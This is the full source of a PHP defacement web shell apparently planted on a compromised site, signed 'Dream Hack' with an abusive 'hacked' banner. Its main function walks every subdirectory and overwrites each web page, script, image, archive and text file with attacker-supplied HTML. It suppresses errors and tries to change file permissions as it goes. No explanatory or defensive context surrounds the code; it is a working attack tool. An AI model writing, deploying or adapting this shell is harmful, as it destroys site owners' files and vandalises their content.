/home/rcfmro/www/ikyy.php
<?php
//By IkzyXmodz
//update 24-10-2025

error_reporting(0);
set_time_limit(0);

// Direktori Target, bisa diganti
$target_dir = getcwd();

// Tipe file yang akan di-deface
$file_types = array('.html', '.htm', '.php', '.asp', '.aspx', '.jsp', '.jpg', '.php5', '.phtml', '.zip', '.md', '.txt', '.png');

// Fungsi utama
function deface_massal($dir, $deface_msg, $types) {
    global $count_deface;
    $files = scandir($dir);
    foreach ($files as $file) {
        if ($file === '.' || $file === '..') {
            continue;
        }
        $path = $dir . '/' . $file;
        if (is_dir($path)) {
            deface_massal($path, $deface_msg, $types);
        } elseif (is_file($path)) {
            $ext = strtolower(strrchr($file, '.'));
            if (in_array($ext, $types)) {
                @chmod($path, 0644); // Coba ubah hak akses
                $handle = fopen($path, 'w');
                if ($handle) {
                    fwrite($handle, $deface_msg);
                    fclose($handle);
                    echo "<font color='lime'>[+] Deface sukses: $path</font><br>";
                    $count_deface++;
                } else {
                    echo "<font color='red'>[-] Gagal deface: $path (Tidak ada akses)</font><br>";
                }
            }
        }
    }
}

// Mulai HTML
?><!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>Touch By Dream Hack</title>
  <link rel="icon" href="https://a.top4top.io/p_3584k44be1.jpg">
  <meta name="robots" content="index, follow">
  <meta name="description" content="Shell Private By ikyyXploit">
  <style>
      html, body {
          margin: 0;
          padding: 0;
          background: black;
          color: lime;
          font-family: monospace;
          height: 100vh; /* Ensure full viewport height */
          width: 100vw; /* Ensure full viewport width */
          overflow-x: hidden;
      }
      body {
          background-image: url('https://a.top4top.io/p_3584k44be1.jpg');
          background-size: cover; /* Cover the entire viewport */
          background-position: center; /* Center the image */
          background-attachment: fixed; /* Keep background fixed */
          background-repeat: no-repeat; /* Prevent repeating */
          min-height: 100vh; /* Ensure body takes full height */
      }
      h1 {
          font-size: 3em;
          color: red;
          animation: glow 2s infinite alternate;
          font-family: 'Arial Black', Gadget, sans-serif;
      }
      @keyframes glow {
          from { text-shadow: 0 0 10px red; }
          to { text-shadow: 0 0 30px red, 0 0 60px darkred; }
      }
      .center {
          position: absolute;
          top: 10%;
          left: 50%;
          transform: translate(-50%, -50%);
          text-align: center;
          z-index: 1; /* Ensure text is above other elements */
      }
      .shell-box {
          position: absolute;
          top: 25%;
          left: 10px;
          right: 10px;
          padding: 10px;
          border: 1px solid lime;
          max-height: 70%;
          overflow: auto;
          color: white;
          background: rgba(0, 0, 0, 0.7); /* Semi-transparent background */
          z-index: 1; /* Ensure shell-box is above background */
      }
      textarea {
          background: black;
          color: white;
          border: 1px solid lime;
          width: 100%;
          height: 300px;
      }
      input[type="submit"] {
          background: black;
          color: red;
          border: 1px solid red;
          font-weight: bold;
          padding: 5px;
      }
  </style>
</head>
<body>
    <div class="center">
        <br>
        <font size="5" color="cyan">Dream Hack Private Shell</font>
        <br>
        <font size="4" color="red">Wh00pz!! We Are Party In Your Secure</font>
        <br>
        <font size="2" color="red">::FUCK YOU::</font>
        <br><br>
        <font size="3" color="red">Thanks To:</font>
        <br>IkzyXmodz - Son1x666 - Mr.Exploit - Orang Biasa - RayanXploit - All Member Dream Hack - DamnBoy - CrazyXploit - AamTechOfficial - HeroXploit - Yora Kintil - ./KING_STAR - Zime Majesty <Hacked>
        <br><br>
    </div>

    <div class="shell-box">
        <h3>Masukkan Kode HTML Deface:</h3>
        <form method="POST">
            <textarea name="deface_code" placeholder="Insert Deface Html..."></textarea><br>
            <input type="submit" name="deface" value="EXECUTE">
        </form>
        <hr>
        <?php
        if(isset($_POST['deface'])) {
            $deface_message = $_POST['deface_code'];
            $count_deface = 0;
            echo "<pre>";
            echo "<font color='lime'>[*] Starting Mass Deface...</font><br>";
            echo "<font color='lime'>[*] Looking for vulnerable files in $target_dir...</font><br>";
            deface_massal($target_dir, $deface_message, $file_types);
            echo "<br><font color='lime'>[+] Operation complete!</font><br>";
            echo "<font color='lime'>[+] Total files defaced: $count_deface</font><br>";
            echo "</pre>";
        }
        ?>
    </div>
</body>
</html>